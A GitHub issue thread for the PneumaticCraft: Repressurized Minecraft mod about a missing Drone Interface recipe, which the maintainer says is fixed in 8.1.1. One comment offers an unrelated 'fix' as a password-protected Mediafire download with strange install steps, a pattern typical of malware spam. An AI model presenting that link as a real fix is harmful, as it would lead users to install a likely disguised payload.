### ISSUE TITLE
Drone Interface not craftable

### ISSUE THREAD

**Issue by yenon** [TeamPneumatic/pnc-repressurized#1340]
### Describe the bug

Drone Interface functional but not craftable.

### How to reproduce the bug

Install ATM 10
Try to look up recipe of the drone interface in creative world.

### Expected behavior

Recipe should be added if CC:Tweaked is present.

### Additional details

Peripheral seems functional, tested 2 actions (suicide, goto).
I skimmed kubejs, there seems to be nothing affecting PneumaticCraft in there.

Also later reproduced with fresh instance of 1.21 with NeoForge and just JEI, CC:Tweaked and PneumaticCraft.

### Which Minecraft version are you using?

1.21

### Which version of PneumaticCraft: Repressurized are you using?

8.1.0 beta

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by desht** [comment]
There have been some stability issues with CC:Tweaked in early 1.21 releases meaning I couldn't pull it into the PNC dev environment without crashes. I will check again to see if there's a stable 1.21 release that I can use; if so, I will get the recipe re-enabled for next PNC release.

**Comment by desht** [comment]
Fixed in 8.1.1
